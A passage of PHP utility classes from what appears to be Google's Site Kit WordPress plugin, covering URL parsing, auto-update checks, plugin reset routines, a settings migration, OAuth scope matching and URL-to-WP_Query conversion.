string $url The URL to parse. * @param int $component The specific component to retrieve. Use one of the PHP * predefined constants to specify which one. * Defaults to -1 (= return all parts as an array). * @return mixed False on parse failure; Array of URL components on success; * When a specific component has been requested: null if the component * doesn't exist in the given URL; a string or - in the case of * PHP_URL_PORT - integer when it does. See parse_url()'s return values. */ public static function parse( $url, $component = -1 ) { $url = (string) $url; if ( mb_strlen( $url, 'UTF-8' ) === strlen( $url ) ) { return wp_parse_url( $url, $component ); } $to_unset = array(); if ( '//' === mb_substr( $url, 0, 2 ) ) { $to_unset[] = 'scheme'; $url = 'placeholder:' . $url; } elseif ( '/' === mb_substr( $url, 0, 1 ) ) { $to_unset[] = 'scheme'; $to_unset[] = 'host'; $url = 'placeholder://placeholder' . $url; } $parts = self::mb_parse_url( $url ); if ( false === $parts ) { // Parsing failure. return $parts; } // Remove the placeholder values. foreach ( $to_unset as $key ) { unset( $parts[ $key ] ); } return _get_component_from_parsed_url_array( $parts, $component ); } /** * Replacement for parse_url which is UTF-8 multi-byte character aware. * * @since 1.84.0 * * @param string $url The URL to parse. * @return mixed False on parse failure; Array of URL components on success */ private static function mb_parse_url( $url ) { $enc_url = preg_replace_callback( '%[^:/@?&=#]+%usD', function ( $matches ) { return rawurlencode( $matches[0] ); }, $url ); $parts = parse_url( $enc_url ); // phpcs:ignore WordPress.WP.AlternativeFunctions.parse_url_parse_url if ( false === $parts ) { return $parts; } foreach ( $parts as $name => $value ) { $parts[ $name ] = urldecode( $value ); } return $parts; } /** * Permutes site URL to cover all different variants of it (not considering the path). * * @since 1.99.0 * * @param string $site_url Site URL to get permutations for. * @return array List of permutations. */ public static function permute_site_url( $site_url ) { $hostname = self::parse( $site_url, PHP_URL_HOST ); $path = self::parse( $site_url, PHP_URL_PATH ); return array_reduce( self::permute_site_hosts( $hostname ), function ( $urls, $host ) use ( $path ) { $host_with_path = $host . $path; array_push( $urls, "https://$host_with_path", "http://$host_with_path" ); return $urls; }, array() ); } /** * Generates common variations of the given hostname. * * Returns a list of hostnames that includes: * - (if IDN) in Punycode encoding * - (if IDN) in Unicode encoding * - with and without www. subdomain (including IDNs) * * @since 1.99.0 * * @param string $hostname Hostname to generate variations of. * @return string[] Hostname variations. */ public static function permute_site_hosts( $hostname ) { if ( ! $hostname || ! is_string( $hostname ) ) { return array(); } // See \Requests_IDNAEncoder::is_ascii. $is_ascii = preg_match( '/(?:[^\x00-\x7F])/', $hostname ) !== 1; $is_www = 0 === strpos( $hostname, 'www.' ); // Normalize hostname without www. $hostname = $is_www ? substr( $hostname, strlen( 'www.' ) ) : $hostname; $hosts = array( $hostname, "www.$hostname" ); try { // An ASCII hostname can only be non-IDN or punycode-encoded. if ( $is_ascii ) { // If the hostname is in punycode encoding, add the decoded version to the list of hosts. if ( 0 === strpos( $hostname, self::PUNYCODE_PREFIX ) || false !== strpos( $hostname, '.' . self::PUNYCODE_PREFIX ) ) { // Ignoring phpcs here, and not passing the variant so that the correct default can be selected by PHP based on the // version. INTL_IDNA_VARIANT_UTS46 for PHP>=7.4, INTL_IDNA_VARIANT_2003 for PHP<7.4. // phpcs:ignore PHPCompatibility.ParameterValues.NewIDNVariantDefault.NotSet $host_decoded = idn_to_utf8( $hostname ); array_push( $hosts, $host_decoded, "www.$host_decoded" ); } } else { // If it's not ASCII, then add the punycode encoded version. // Ignoring phpcs here, and not passing the variant so that the correct default can be selected by PHP based on the // version. INTL_IDNA_VARIANT_UTS46 for PHP>=7.4, INTL_IDNA_VARIANT_2003 for PHP<7.4. // phpcs:ignore PHPCompatibility.ParameterValues.NewIDNVariantDefault.NotSet $host_encoded = idn_to_ascii( $hostname ); array_push( $hosts, $host_encoded, "www.$host_encoded" ); } } catch ( Exception $exception ) { // phpcs:ignore Generic.CodeAnalysis.EmptyStatement.DetectedCatch // Do nothing. } return $hosts; } } <?php /** * Class Google\Site_Kit\Core\Util\Auto_Updates * * @package Google\Site_Kit\Core\Util * @copyright 2022 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; use stdClass; /** * Utility class for auto-updates settings. * * @since 1.93.0 * @access private * @ignore */ class Auto_Updates { /** * Auto updated forced enabled. * * @since 1.93.0 * @var true */ const AUTO_UPDATE_FORCED_ENABLED = true; /** * Auto updated forced disabled. * * @since 1.93.0 * @var false */ const AUTO_UPDATE_FORCED_DISABLED = false; /** * Auto updated not forced. * * @since 1.93.0 * @var false */ const AUTO_UPDATE_NOT_FORCED = null; /** * Checks whether plugin auto-updates are enabled for the site. * * @since 1.93.0 * * @return bool `false` if auto-updates are disabled, `true` otherwise. */ public static function is_plugin_autoupdates_enabled() { if ( self::AUTO_UPDATE_FORCED_DISABLED === self::sitekit_forced_autoupdates_status() ) { return false; } if ( function_exists( 'wp_is_auto_update_enabled_for_type' ) ) { return wp_is_auto_update_enabled_for_type( 'plugin' ); } return false; } /** * Check whether the site has auto updates enabled for Site Kit. * * @since 1.93.0 * * @return bool `true` if auto updates are enabled, otherwise `false`. */ public static function is_sitekit_autoupdates_enabled() { if ( self::AUTO_UPDATE_FORCED_ENABLED === self::sitekit_forced_autoupdates_status() ) { return true; } if ( self::AUTO_UPDATE_FORCED_DISABLED === self::sitekit_forced_autoupdates_status() ) { return false; } $enabled_auto_updates = (array) get_site_option( 'auto_update_plugins', array() ); if ( ! $enabled_auto_updates ) { return false; } // Check if the Site Kit is in the list of auto-updated plugins. return in_array( GOOGLESITEKIT_PLUGIN_BASENAME, $enabled_auto_updates, true ); } /** * Checks whether auto-updates are forced for Site Kit. * * @since 1.93.0 * * @return bool|null */ public static function sitekit_forced_autoupdates_status() { if ( ! function_exists( 'wp_is_auto_update_forced_for_item' ) ) { return self::AUTO_UPDATE_NOT_FORCED; } if ( ! function_exists( 'get_plugin_data' ) ) { require_once ABSPATH . 'wp-admin/includes/plugin.php'; } $sitekit_plugin_data = get_plugin_data( GOOGLESITEKIT_PLUGIN_MAIN_FILE ); $sitekit_update_data = self::get_sitekit_update_data(); $item = (object) array_merge( $sitekit_plugin_data, $sitekit_update_data ); $is_auto_update_forced_for_sitekit = wp_is_auto_update_forced_for_item( 'plugin', null, $item ); if ( true === $is_auto_update_forced_for_sitekit ) { return self::AUTO_UPDATE_FORCED_ENABLED; } if ( false === $is_auto_update_forced_for_sitekit ) { return self::AUTO_UPDATE_FORCED_DISABLED; } return self::AUTO_UPDATE_NOT_FORCED; } /** * Merges plugin update data in the site transient with some default plugin data. * * @since 1.113.0 * * @return array Site Kit plugin update data. */ protected static function get_sitekit_update_data() { $sitekit_update_data = array( 'id' => 'w.org/plugins/' . dirname( GOOGLESITEKIT_PLUGIN_BASENAME ), 'slug' => dirname( GOOGLESITEKIT_PLUGIN_BASENAME ), 'plugin' => GOOGLESITEKIT_PLUGIN_BASENAME, 'new_version' => '', 'url' => '', 'package' => '', 'icons' => array(), 'banners' => array(), 'banners_rtl' => array(), 'tested' => '', 'requires_php' => GOOGLESITEKIT_PHP_MINIMUM, 'compatibility' => new stdClass(), ); $plugin_updates = get_site_transient( 'update_plugins' ); $transient_data = array(); if ( isset( $plugin_updates->noupdate[ GOOGLESITEKIT_PLUGIN_BASENAME ] ) ) { $transient_data = $plugin_updates->noupdate[ GOOGLESITEKIT_PLUGIN_BASENAME ]; } if ( isset( $plugin_updates->response[ GOOGLESITEKIT_PLUGIN_BASENAME ] ) ) { $transient_data = $plugin_updates->response[ GOOGLESITEKIT_PLUGIN_BASENAME ]; } return array_merge( $sitekit_update_data, (array) $transient_data ); } } <?php /** * Class Google\Site_Kit\Core\Util\Reset_Persistent * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; /** * Class providing functions to reset the persistent plugin settings. * * @since 1.27.0 * @access private * @ignore */ class Reset_Persistent extends Reset { /** * MySQL key pattern for all persistent Site Kit keys. */ const KEY_PATTERN = 'googlesitekitpersistent\_%'; /** * REST API endpoint. */ const REST_ROUTE = 'core/site/data/reset-persistent'; } <?php /** * Migration for Audience Settings. * * @package Google\Site_Kit\Core\Util * @copyright 2025 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Storage\Options; use Google\Site_Kit\Modules\Analytics_4\Settings as Analytics_Settings; use Google\Site_Kit\Modules\Analytics_4\Audience_Settings; /** * Class Migration_1_150_0 * * @since 1.151.0 * @access private * @ignore */ class Migration_1_150_0 { /** * Target DB version. */ const DB_VERSION = '1.150.0'; /** * DB version option name. */ const DB_VERSION_OPTION = 'googlesitekit_db_version'; /** * Context instance. * * @since 1.151.0 * @var Context */ protected $context; /** * Options instance. * * @since 1.151.0 * @var Options */ protected $options; /** * Analytics_Settings instance. * * @since 1.151.0 * @var Analytics_Settings */ protected $analytics_settings; /** * Audience_Settings instance. * * @since 1.151.0 * @var Audience_Settings */ protected $audience_settings; /** * Constructor. * * @since 1.151.0 * * @param Context $context Plugin context instance. * @param Options $options Optional. Options instance. */ public function __construct( Context $context, ?Options $options = null ) { $this->context = $context; $this->options = $options ?: new Options( $context ); $this->analytics_settings = new Analytics_Settings( $this->options ); $this->audience_settings = new Audience_Settings( $this->options ); } /** * Registers hooks. * * @since 1.151.0 */ public function register() { add_action( 'admin_init', array( $this, 'migrate' ) ); } /** * Migrates the DB. * * @since 1.151.0 */ public function migrate() { $db_version = $this->options->get( self::DB_VERSION_OPTION ); if ( ! $db_version || version_compare( $db_version, self::DB_VERSION, '<' ) ) { $this->migrate_audience_settings(); $this->options->set( self::DB_VERSION_OPTION, self::DB_VERSION ); } } /** * Migrates the Audience Settings from Analytics settings to new Audience settings. * * @since 1.151.0 */ protected function migrate_audience_settings() { if ( ! $this->analytics_settings->has() ) { return; } $analytics_settings = $this->analytics_settings->get(); if ( ! is_array( $analytics_settings ) || empty( $analytics_settings ) ) { return; } $audience_settings = (array) $this->audience_settings->get(); $keys_to_migrate = array( 'availableAudiences', 'availableAudiencesLastSyncedAt', 'audienceSegmentationSetupCompletedBy', ); $has_migration = false; foreach ( $keys_to_migrate as $key ) { if ( array_key_exists( $key, $analytics_settings ) ) { $audience_settings[ $key ] = $analytics_settings[ $key ]; unset( $analytics_settings[ $key ] ); $has_migration = true; } } if ( $has_migration ) { $this->audience_settings->set( $audience_settings ); $this->analytics_settings->set( $analytics_settings ); } } } <?php /** * Class Google\Site_Kit\Core\Util\Scopes * * @package Google\Site_Kit\Core\Util * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; /** * Utility class for handling generic OAuth scope functions. * * @since 1.9.0 * @access private * @ignore */ class Scopes { /** * Mapping of requested scope to satisfying scopes. * * @since 1.9.0 * * @var array */ protected static $map = array( 'https://www.googleapis.com/auth/adsense.readonly' => array( 'https://www.googleapis.com/auth/adsense', ), 'https://www.googleapis.com/auth/analytics.readonly' => array( 'requires_all' => true, 'https://www.googleapis.com/auth/analytics', 'https://www.googleapis.com/auth/analytics.edit', ), 'https://www.googleapis.com/auth/tagmanager.readonly' => array( 'https://www.googleapis.com/auth/tagmanager.edit.containers', ), 'https://www.googleapis.com/auth/webmasters.readonly' => array( 'https://www.googleapis.com/auth/webmasters', ), ); /** * Tests if the given scope is satisfied by the given list of granted scopes. * * @since 1.9.0 * * @param string $scope OAuth scope to test for. * @param string[] $granted_scopes Available OAuth scopes to test the individual scope against. * @return bool True if the given scope is satisfied, otherwise false. */ public static function is_satisfied_by( $scope, array $granted_scopes ) { if ( in_array( $scope, $granted_scopes, true ) ) { return true; } if ( empty( self::$map[ $scope ] ) ) { return false; } $satisfying_scopes = array_filter( self::$map[ $scope ], 'is_string' ); if ( ! empty( self::$map[ $scope ]['requires_all'] ) ) { // Return true if all satisfying scopes are present, otherwise false. return ! array_diff( $satisfying_scopes, $granted_scopes ); } // Return true if any of the scopes are present, otherwise false. return (bool) array_intersect( $satisfying_scopes, $granted_scopes ); } /** * Tests if all the given scopes are satisfied by the list of granted scopes. * * @since 1.9.0 * * @param string[] $scopes OAuth scopes to test. * @param string[] $granted_scopes OAuth scopes to test $scopes against. * @return bool True if all given scopes are satisfied, otherwise false. */ public static function are_satisfied_by( array $scopes, array $granted_scopes ) { foreach ( $scopes as $scope ) { if ( ! self::is_satisfied_by( $scope, $granted_scopes ) ) { return false; } } return true; } } <?php /** * Class Google\Site_Kit\Core\Util\Reset * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Email_Reporting\Email_Log; use Google\Site_Kit\Core\Authentication\Authentication; use Google\Site_Kit\Core\Permissions\Permissions; use Google\Site_Kit\Core\REST_API\REST_Route; use WP_REST_Server; use WP_REST_Request; use WP_REST_Response; /** * Class providing functions to reset the plugin. * * @since 1.0.0 * @since 1.1.1 Removed delete_all_plugin_options(), delete_all_user_metas() and delete_all_transients() methods. * @access private * @ignore */ class Reset { /** * MySQL key pattern for all Site Kit keys. */ const KEY_PATTERN = 'googlesitekit\_%'; /** * REST API endpoint. */ const REST_ROUTE = 'core/site/data/reset'; /** * Action for triggering a reset. */ const ACTION = 'googlesitekit_reset'; /** * Plugin context. * * @since 1.0.0 * @var Context */ private $context; /** * Gets the URL to handle a reset action. * * @since 1.30.0 * * @return string */ public static function url() { return add_query_arg( array( 'action' => static::ACTION, 'nonce' => wp_create_nonce( static::ACTION ), ), admin_url( 'index.php' ) ); } /** * Constructor. * * @since 1.0.0 * @since 1.1.1 Removed $options and $transients params. * * @param Context $context Plugin context. */ public function __construct( Context $context ) { $this->context = $context; } /** * Registers functionality through WordPress hooks. * * @since 1.3.0 */ public function register() { add_filter( 'googlesitekit_rest_routes', function ( $routes ) { return array_merge( $routes, $this->get_rest_routes() ); } ); add_action( 'admin_action_' . static::ACTION, function () { $this->handle_reset_action( $this->context->input()->filter( INPUT_GET, 'nonce' ) ); } ); } /** * Deletes options, user stored options, transients and clears object cache for stored options. * * @since 1.0.0 */ public function all() { $this->delete_options( 'site' ); $this->delete_user_options( 'site' ); $this->delete_post_meta( 'site' ); $this->delete_term_meta( 'site' ); $this->delete_posts( 'site' ); if ( $this->context->is_network_mode() ) { $this->delete_options( 'network' ); $this->delete_user_options( 'network' ); $this->delete_post_meta( 'network' ); $this->delete_term_meta( 'network' ); $this->delete_posts( 'network' ); } wp_cache_flush(); } /** * Deletes all Site Kit options and transients. * * @since 1.3.0 * * @param string $scope Scope of the deletion ('site' or 'network'). */ private function delete_options( $scope ) { global $wpdb; if ( 'site' === $scope ) { list ( $table_name, $column_name, $transient_prefix ) = array( $wpdb->options, 'option_name', '_transient_' ); } elseif ( 'network' === $scope ) { list ( $table_name, $column_name, $transient_prefix ) = array( $wpdb->sitemeta, 'meta_key', '_site_transient_' ); } else { return; } // phpcs:ignore WordPress.DB.DirectDatabaseQuery $wpdb->query( $wpdb->prepare( /* phpcs:disable WordPress.DB.PreparedSQL.InterpolatedNotPrepared */ " DELETE FROM {$table_name} WHERE {$column_name} LIKE %s OR {$column_name} LIKE %s OR {$column_name} LIKE %s OR {$column_name} = %s ", /* phpcs:enable WordPress.DB.PreparedSQL.InterpolatedNotPrepared */ static::KEY_PATTERN, $transient_prefix . static::KEY_PATTERN, $transient_prefix . 'timeout_' . static::KEY_PATTERN, 'googlesitekit-active-modules' ) ); } /** * Deletes all Site Kit user options. * * @param string $scope Scope of the deletion ('site' or 'network'). */ private function delete_user_options( $scope ) { global $wpdb; if ( 'site' === $scope ) { $meta_prefix = $wpdb->get_blog_prefix(); } elseif ( 'network' === $scope ) { $meta_prefix = ''; } else { return; } // phpcs:ignore WordPress.DB.DirectDatabaseQuery $wpdb->query( $wpdb->prepare( "DELETE FROM {$wpdb->usermeta} WHERE meta_key LIKE %s", $meta_prefix . static::KEY_PATTERN ) ); } /** * Deletes all Site Kit post meta settings. * * @since 1.33.0 * * @param string $scope Scope of the deletion ('site' or 'network'). */ private function delete_post_meta( $scope ) { global $wpdb; $sites = array(); if ( 'network' === $scope ) { $sites = get_sites( array( 'fields' => 'ids', 'number' => 9999999, ) ); } else { $sites[] = get_current_blog_id(); } foreach ( $sites as $site_id ) { $prefix = $wpdb->get_blog_prefix( $site_id ); // phpcs:ignore WordPress.DB.DirectDatabaseQuery $wpdb->query( $wpdb->prepare( "DELETE FROM {$prefix}postmeta WHERE `meta_key` LIKE %s", // phpcs:ignore WordPress.DB.PreparedSQL.InterpolatedNotPrepared static::KEY_PATTERN ) ); } } /** * Deletes all Site Kit term meta settings. * * @since 1.146.0 * * @param string $scope Scope of the deletion ('site' or 'network'). */ private function delete_term_meta( $scope ) { global $wpdb; $sites = array(); if ( 'network' === $scope ) { $sites = get_sites( array( 'fields' => 'ids', 'number' => 9999999, ) ); } else { $sites[] = get_current_blog_id(); } foreach ( $sites as $site_id ) { $prefix = $wpdb->get_blog_prefix( $site_id ); // phpcs:ignore WordPress.DB.DirectDatabaseQuery $wpdb->query( $wpdb->prepare( "DELETE FROM {$prefix}termmeta WHERE `meta_key` LIKE %s", // phpcs:ignore WordPress.DB.PreparedSQL.InterpolatedNotPrepared static::KEY_PATTERN ) ); } } /** * Deletes all Site Kit custom post type posts. * * @since 1.167.0 * * @param string $scope Scope of the deletion ('site' or 'network'). */ private function delete_posts( $scope ) { $sites = array(); if ( 'network' === $scope ) { $sites = get_sites( array( 'fields' => 'ids', 'number' => 9999999, ) ); } elseif ( 'site' === $scope ) { $sites[] = get_current_blog_id(); } else { return; } foreach ( $sites as $site_id ) { $switched = false; if ( get_current_blog_id() !== (int) $site_id ) { // phpcs:ignore WordPressVIPMinimum.Functions.RestrictedFunctions.switch_to_blog_switch_to_blog switch_to_blog( $site_id ); $switched = true; } $posts_per_batch = 100; do { // phpcs:ignore WordPressVIPMinimum.Functions.RestrictedFunctions.get_posts_get_posts $post_ids = get_posts( array( 'post_type' => Email_Log::POST_TYPE, 'post_status' => array( Email_Log::STATUS_SENT, Email_Log::STATUS_FAILED, Email_Log::STATUS_SCHEDULED, ), 'fields' => 'ids', 'posts_per_page' => $posts_per_batch, 'no_found_rows' => true, 'orderby' => 'ID', 'order' => 'ASC', ) ); foreach ( $post_ids as $post_id ) { wp_delete_post( $post_id, true ); } } while ( ! empty( $post_ids ) ); if ( $switched ) { restore_current_blog(); } } } /** * Gets related REST routes. * * @since 1.3.0 * * @return array List of REST_Route objects. */ private function get_rest_routes() { $can_setup = function () { return current_user_can( Permissions::SETUP ); }; return array( new REST_Route( static::REST_ROUTE, array( array( 'methods' => WP_REST_Server::EDITABLE, 'callback' => function () { $this->all(); $this->maybe_hard_reset(); // Call hooks on plugin reset. This is used to reset the ad blocking recovery notification. do_action( 'googlesitekit_reset' ); return new WP_REST_Response( true ); }, 'permission_callback' => $can_setup, ), ) ), ); } /** * Handles the reset admin action. * * @since 1.30.0 * * @param string $nonce WP nonce for action. */ private function handle_reset_action( $nonce ) { if ( ! wp_verify_nonce( $nonce, static::ACTION ) ) { $authentication = new Authentication( $this->context ); $authentication->invalid_nonce_error( static::ACTION ); } if ( ! current_user_can( Permissions::SETUP ) ) { wp_die( esc_html__( 'You don’t have permissions to set up Site Kit.', 'google-site-kit' ), 403 ); } // Call hooks on plugin reset. This is used to reset the ad blocking recovery notification. do_action( 'googlesitekit_reset' ); $this->all(); $this->maybe_hard_reset(); wp_safe_redirect( $this->context->admin_url( 'splash', array( // Trigger client-side storage reset. 'googlesitekit_reset_session' => 1, // Show reset-success notification. 'notification' => 'reset_success', ) ) ); exit; } /** * Performs hard reset if it is enabled programmatically. * * @since 1.46.0 */ public function maybe_hard_reset() { /** * Filters the hard reset option, which is `false` by default. * * By default, when Site Kit is reset it does not delete "persistent" data * (options prefixed with `googlesitekitpersistent_`). If this filter returns `true`, * all options belonging to Site Kit, including those with the above "persistent" * prefix, will be deleted. * * @since 1.46.0 * * @param bool $hard_reset_enabled If a hard reset is enabled. `false` by default. */ $hard_reset_enabled = apply_filters( 'googlesitekit_hard_reset_enabled', false ); if ( ! $hard_reset_enabled ) { return; } $reset_persistent = new Reset_Persistent( $this->context ); $reset_persistent->all(); } } <?php /** * Class Google\Site_Kit\Core\Util\WP_Query_Factory * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; use WP_Query; /** * Class creating `WP_Query` instances. * * @since 1.15.0 * @access private * @ignore */ final class WP_Query_Factory { use WP_Context_Switcher_Trait; /** * Creates a `WP_Query` instance to use for a given URL. * * The `WP_Query` instance returned is initialized with the correct query arguments, but the actual query will not * have run yet. The `WP_Query::get_posts()` method should be used to do that. * * This is an expensive function that works similarly to WordPress core's `url_to_postid()` function, however also * covering non-post URLs. It follows logic used in `WP::parse_request()` to cover the other kinds of URLs. The * majority of the code is a direct copy of certain parts of these functions. * * @since 1.15.0 * * @param string $url URL to get WordPress query object for. * @return WP_Query|null WordPress query instance, or null if unable to parse query from URL. */ public static function from_url( $url ) { $url = self::normalize_url( $url ); if ( empty( $url ) ) { return null; } $url_path_vars = self::get_url_path_vars( $url ); $url_query_vars = self::get_url_query_vars( $url ); $query_args = self::parse_wp_query_args( $url_path_vars, $url_query_vars ); $restore_context = self::with_frontend_context(); // Return extended version of `WP_Query` with self-contained 404 detection. $query = new Synthetic_WP_Query(); $query->parse_query( $query_args ); $query->enable_404_detection( true ); $restore_context(); return $query; } /** * Normalizes the URL for further processing. * * @since 1.15.0 * * @param string $url URL to normalize. * @return string Normalized URL, or empty string if URL is irrelevant for parsing into `WP_Query` arguments. */ private static function normalize_url( $url ) { global $wp_rewrite; $url_host = str_replace( 'www.', '', URL::parse( $url, PHP_URL_HOST ) ); $home_url_host = str_replace( 'www.', '', URL::parse( home_url(), PHP_URL_HOST ) ); // Bail early if the URL does not belong to this site. if ( $url_host && $url_host !== $home_url_host ) { return ''; } // Strip 'index.php/' if we're not using path info permalinks. if ( ! $wp_rewrite->using_index_permalinks() ) { $url = str_replace( $wp_rewrite->index . '/', '', $url ); } return $url; } /** * Parses the path segment of a URL to get variables based on WordPress rewrite rules. * * The variables returned from this method are not necessarily all relevant for a `WP_Query`, they will still need * to go through sanitization against the available public query vars from WordPress. * * This code is mostly a partial copy of `WP::parse_request()` which is used to parse the current request URL * into variables in a similar way. * * @since 1.15.0 * * @param string $url URL to parse path vars from. * @return array Associative array of path vars. */ private static function get_url_path_vars( $url ) { global $wp_rewrite; $url_path = URL::parse( $url, PHP_URL_PATH ); // Strip potential home URL path segment from URL path. $home_path = untrailingslashit( URL::parse( home_url( '/' ), PHP_URL_PATH ) ); if ( ! empty( $home_path ) ) { $url_path = substr( $url_path, strlen( $home_path ) ); } // Strip leading and trailing slashes. if ( is_string( $url_path ) ) { $url_path = trim( $url_path, '/' ); } // Fetch the rewrite rules. $rewrite = $wp_rewrite->wp_rewrite_rules(); // Match path against rewrite rules. $matched_rule = ''; $query = ''; $matches = array(); if ( empty( $url_path ) || $url_path === $wp_rewrite->index ) { if ( isset( $rewrite['$'] ) ) { $matched_rule = '$'; $query = $rewrite['$']; $matches = array( '' ); } } else { foreach ( (array) $rewrite as $match => $query ) { if ( preg_match( "#^$match#", $url_path, $matches ) ) { if ( $wp_rewrite->use_verbose_page_rules && preg_match( '/pagename=\$matches\[([0-9]+)\]/', $query, $varmatch ) ) { // This is a verbose page match, let's check to be sure about it. // We'll rely 100% on WP core functions here. // phpcs:ignore WordPressVIPMinimum.Functions.RestrictedFunctions $page = get_page_by_path( $matches[ $varmatch[1] ] ); if ( ! $page ) { continue; } $post_status_obj = get_post_status_object( $page->post_status ); if ( ! $post_status_obj->public && ! $post_status_obj->protected && ! $post_status_obj->private && $post_status_obj->exclude_from_search ) { continue; } } $matched_rule = $match; break; } } } // If rewrite rules matched, populate $url_path_vars. $url_path_vars = array(); if ( $matched_rule ) { // Trim the query of everything up to the '?'. $query = preg_replace( '!^.+\?!', '', $query ); // Substitute the substring matches into the query. $query = addslashes( \WP_MatchesMapRegex::apply( $query, $matches ) ); parse_str( $query, $url_path_vars ); } return $url_path_vars; } /** * Parses the query segment of a URL to get variables. * * The variables returned from this method are not necessarily all relevant for a `WP_Query`, they will still need * to go through sanitization against the available public query vars from WordPress. * * @since 1.15.0 * * @param string $url URL to parse query vars from. * @return array Associative array of query vars. */ private static function get_url_query_vars( $url ) { $url_query = URL::parse( $url, PHP_URL_QUERY ); $url_query_vars = array(); if ( $url_query ) { parse_str( $url_query, $url_query_vars ); } return $url_query_vars; } /** * Returns arguments for a `WP_Query` instance based on URL path vars and URL query vars. * * This method essentially sanitizes the passed vars, allowing only WordPress public query vars to be used as * actual arguments for `WP_Query`. When combining URL path vars and URL query vars, the latter take precedence. * * This code is mostly a partial copy of `WP::parse_request()` which is used to parse the current request URL * into query arguments in a similar way. * * @since 1.15.0 * * @param array $url_path_vars Associative array as returned from {@see WP_Query_Factory::get_url_path_vars()}. * @param array $url_query_vars Associative array as returned from {@see WP_Query_Factory::get_url_query_vars()}. * @return array Associative array of arguments to pass to a `WP_Query` instance. */ private static function parse_wp_query_args( array $url_path_vars, array $url_query_vars ) { global $wp; // Determine available post type query vars. $post_type_query_vars = array(); foreach ( get_post_types( array(), 'objects' ) as $post_type => $post_type_obj ) { if ( is_post_type_viewable( $post_type_obj ) && $post_type_obj->query_var ) { $post_type_query_vars[ $post_type_obj->query_var ] = $post_type; } } // Depending on whether WordPress already parsed the main request (and thus filtered 'query_vars'), we should // either manually trigger the filter or not. if ( did_action( 'parse_request' ) ) { $public_query_vars = $wp->public_query_vars; } else { $public_query_vars = apply_filters( 'query_vars', $wp->public_query_vars ); } // Populate `WP_Query` arguments. $query_args = array(); foreach ( $public_query_vars as $wpvar ) { if ( isset( $url_query_vars[ $wpvar ] ) ) { $query_args[ $wpvar ] = $url_query_vars[ $wpvar ]; } elseif ( isset( $url_path_vars[ $wpvar ] ) ) { $query_args[ $wpvar ] = $url_path_vars[ $wpvar ]; } if ( ! empty( $query_args[ $wpvar ] ) ) { if ( ! is_array( $query_args[ $wpvar ] ) ) { $query_args[ $wpvar ] = (string) $query_args[ $wpvar ]; } else { foreach ( $query_args[ $wpvar ] as $key => $value ) { if ( is_scalar( $value ) ) { $query_args[ $wpvar ][ $key ] = (string) $value; } } } if ( isset( $post_type_query_vars[ $wpvar ] ) ) { $query_args['post_type'] = $post_type_query_vars[ $wpvar ]; $query_args['name'] = $query_args[ $wpvar ]; } } } // Convert urldecoded spaces back into '+'. foreach ( get_taxonomies( array(), 'objects' ) as $taxonomy => $taxonomy_obj ) { if ( $taxonomy_obj->query_var && isset( $query_args[ $taxonomy_obj->query_var ] ) ) { $query_args[ $taxonomy_obj->query_var ] = str_replace( ' ', '+', $query_args[ $taxonomy_obj->query_var ] ); } } // Don't allow non-publicly queryable taxonomies to be queried from the front end. foreach ( get_taxonomies( array( 'publicly_queryable' => false ), 'objects' ) as $taxonomy => $t ) { if ( isset( $query_args['taxonomy'] ) && $taxonomy === $query_args['taxonomy'] ) { unset( $query_args['taxonomy'], $query_args['term'] ); } } // Limit publicly queried post_types to those that are 'publicly_queryable'. if ( isset( $query_args['post_type'] ) ) { $queryable_post_types = get_post_types( array( 'publicly_queryable' => true ) ); if ( ! is_array( $query_args['post_type'] ) ) { if ( ! in_array( $query_args['post_type'], $queryable_post_types, true ) ) { unset( $query_args['post_type'] ); } } else { $query_args['post_type'] = array_intersect( $query_args['post_type'], $queryable_post_types ); } } // Resolve conflicts between posts with numeric slugs and date archive queries. $query_args = wp_resolve_numeric_slug_conflicts( $query_args ); // This is a WordPress core filter applied here to allow for the same modifications (e.g. for post formats). $query_args = apply_filters( 'request', $query_args ); return $query_args; } } <?php /** * Class Google\Site_Kit\Core\Util\Entity * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; /** * Class representing an entity. * * An entity in Site Kit terminology is based on a canonical URL, i.e. every * canonical frontend URL has an associated entity. * * An entity may also have a type, if it can be determined. * Possible types are e.g. 'post' for a WordPress post (of any post type!), * 'term' for a WordPress term (of any taxonomy!), 'blog' for the blog archive, * 'date' for a date-based archive etc. * * For specific entity types, the entity will also have a title, and it may * even have an ID. For example: * * For a type of 'post', the entity ID will be the post ID and the entity * title will be the post title. * * For a type of 'term', the entity ID will be the term ID and the entity * title will be the term title. * * For a type of 'date', there will be no entity ID, but the entity title * will be the title of the date-based archive. * * @since 1.7.0 * @access private * @ignore */ final class Entity { /** * The entity URL. * * @since 1.7.0 * @var string */ private $url; /** * The entity type. * * @since 1.7.0 * @var string */ private $type; /** * The entity title. * * @since 1.7.0 * @var string */ private $title; /** * The entity ID. * * @since 1.7.0 * @var int */ private $id; /** * Entity URL sub-variant. * * @since 1.42.0 * @var string */ private $mode; /** * Constructor. * * @since 1.7.0 * * @param string $url The entity URL. * @param array $args { * Optional. Additional entity arguments. * * @type string $type The entity type. * @type string $title The entity title. * @type int $id The entity ID. * @type string $mode Entity URL sub-variant. * } */ public function __construct( $url, array $args = array() ) { $args = array_merge( array( 'type' => '', 'title' => '', 'id' => 0, 'mode' => '', ), $args ); $this->url = $url; $this->type = (string) $args['type']; $this->title = (string) $args['title']; 